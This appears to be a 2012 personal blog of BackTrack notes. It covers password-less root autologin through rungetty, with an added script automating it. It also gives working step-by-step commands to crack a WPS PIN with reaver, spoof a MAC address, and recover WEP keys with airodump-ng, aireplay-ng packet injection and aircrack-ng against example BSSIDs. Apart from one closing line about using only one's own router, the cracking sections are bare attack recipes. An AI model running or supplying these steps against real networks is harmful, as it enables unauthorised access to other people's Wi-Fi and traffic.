To enable BackTrack to auto-start without a password, you will need to install rungetty and make a few other tweaks.
1. Install Rungetty
apt-get install rungetty
2. Now you have to edit the conf file of getty.
vi /etc/init/tty1.conf
Go down to the line exec /sbin/getty -8 38400 tty1 and put a # in front of it:
#exec /sbin/getty -8 38400 tty1
After doing that, you need to add this line
exec /sbin/rungetty tty1 --autologin root
3. Now you're done editing this file and you need to save and exit.
Press "Esc" to exit insert mode. Then type :x to save and exit
4. Now we need to create a bash file to run BackTrack automatically.
Let's check whether the bash profile is already there.
ls /root/.bash_profile
If the file does not exist, create the .bash_profile file now. We are going to use "touch", as it also puts the current timestamp on the newly created file.
touch ~/.bash_profile
~ is shorthand for the home directory (here /root), so this is the same file as /root/.bash_profile. If you want to know the directory you are currently in, just type "pwd".
5. Since the .bash_profile file is empty, we need to edit and enter values in it.
vi /root/.bash_profile
Once you are in insert mode, just add one line:
startx
Now save and exit. There you go. Now BackTrack starts without logging in. Note that this removes the login prompt entirely: anyone with physical access to the console gets a root X session.
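The five steps above as one script (an added example, not part of the original post). It applies the same edits, commenting out the getty line, appending the rungetty autologin line and putting startx into .bash_profile, but takes the file paths as arguments so it can be tried on copies first, re-run safely without adding a second exec line, and checked with verify_autologin before a reboot. The function names and the --apply flag are this example's own; the file paths and commands are the ones from the steps.

```shell
#!/bin/sh
# Added example: scripted version of the rungetty autologin steps.
# Pass --apply to edit the real /etc/init/tty1.conf and /root/.bash_profile;
# without it, only the functions are defined so they can be run on copies.

configure_tty_autologin() {
    conf="$1"            # path to an Upstart tty1.conf (or a copy of it)
    user="${2:-root}"    # account to log in automatically (the post uses root)
    # Already configured? Then do nothing, so re-running never adds a second exec line.
    if grep -q "^exec /sbin/rungetty tty1 --autologin" "$conf"; then
        return 0
    fi
    cp "$conf" "$conf.bak"   # keep the original around for rollback
    # Step 2a: comment out the original getty line.
    sed 's|^exec /sbin/getty |#exec /sbin/getty |' "$conf" > "$conf.tmp" &&
        mv "$conf.tmp" "$conf"
    # Step 2b: add the rungetty autologin line.
    printf 'exec /sbin/rungetty tty1 --autologin %s\n' "$user" >> "$conf"
}

ensure_startx_profile() {
    profile="$1"             # path to the .bash_profile to create or extend
    touch "$profile"         # steps 4 and 5: create the file if it is missing
    grep -qx 'startx' "$profile" || echo 'startx' >> "$profile"
}

# Returns 0 only when all three edits are in place.
verify_autologin() {
    conf="$1"; profile="$2"
    grep -q '^#exec /sbin/getty ' "$conf" &&
    grep -q '^exec /sbin/rungetty tty1 --autologin ' "$conf" &&
    grep -qx 'startx' "$profile"
}

if [ "${1:-}" = "--apply" ]; then
    configure_tty_autologin /etc/init/tty1.conf root
    ensure_startx_profile /root/.bash_profile
    verify_autologin /etc/init/tty1.conf /root/.bash_profile && echo "autologin configured"
fi
```

Run it as sh autologin.sh --apply on the BackTrack box, or source it and call the functions on a copy of tty1.conf to see the resulting file before touching the real one. Since the result is a password-less root console, keep this to a throwaway lab image.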
Friday, August 17, 2012
Thursday, August 16, 2012
Cracking WPA with reaver (actually cracking WPS)
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1) To view wireless interfaces
iwconfig
2) Put wireless interface into monitoring mode
airmon-ng start wlan1
3) Scan all the BSSID in the area
airodump-ng mon0
4) Using reaver to crack the WPS
reaver -i (moninterface) -b (bssid) -vv
reaver -i mon0 -b 90:94:E4:29:14:64 -vv
Sunday, August 12, 2012
Changing MAC Address
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
ifconfig (interface) up
How to crack WEP via Backtrack 5
1. Check for WLAN interface
ifconfig
iwconfig
airmon-ng
2. Start MONITORING on WLAN interface
airmon-ng start (WLAN interface)
=> airmon-ng start wlan0
3. Now a new MONITOR interface is created (mon0). Sniff the existing WiFi networks.
airodump-ng mon0
Now, you can see all the BSSID and also clients connecting to the AP. Choose a WEP BSSID to crack.
Keep track of the BSSID, channel and Data.
Type Ctrl+C to stop scan
4. Time to scan the specific BSSID.
Open a new Terminal.
airodump-ng -w wep -c (channel no) --bssid (bssid) (monitor interface)
=> airodump-ng -w wep -c 6 --bssid 90:32:00:00:44:11 mon0
5. Associating aireplay with mon0
Open a new Terminal.
aireplay-ng -1 0 -a (bssid) (monitoring interface)
=> aireplay-ng -1 0 -a 90:32:00:00:44:11 mon0
6. Sending Packets to the BSSID and gathering back Packets for decrypting the WEP key.
Open a new Terminal
aireplay-ng -3 -b (bssid) (monitor interface)
=> aireplay-ng -3 -b 90:32:00:00:44:11 mon0
7. Time to decrypt the WEP key.
Go back to the Terminal of Item "4" (Scanning specific BSSID).
Check whether the Beacon or Data count has reached 3,000 packets. The replay from the previous item increases the packet count.
Open a new Terminal
aircrack-ng wep-01.cap
The WEP key is printed beside "KEY FOUND!". Just drop the colons between the hex bytes.
Have a good try on your own WiFi Router. Do not try it on other WiFi AP.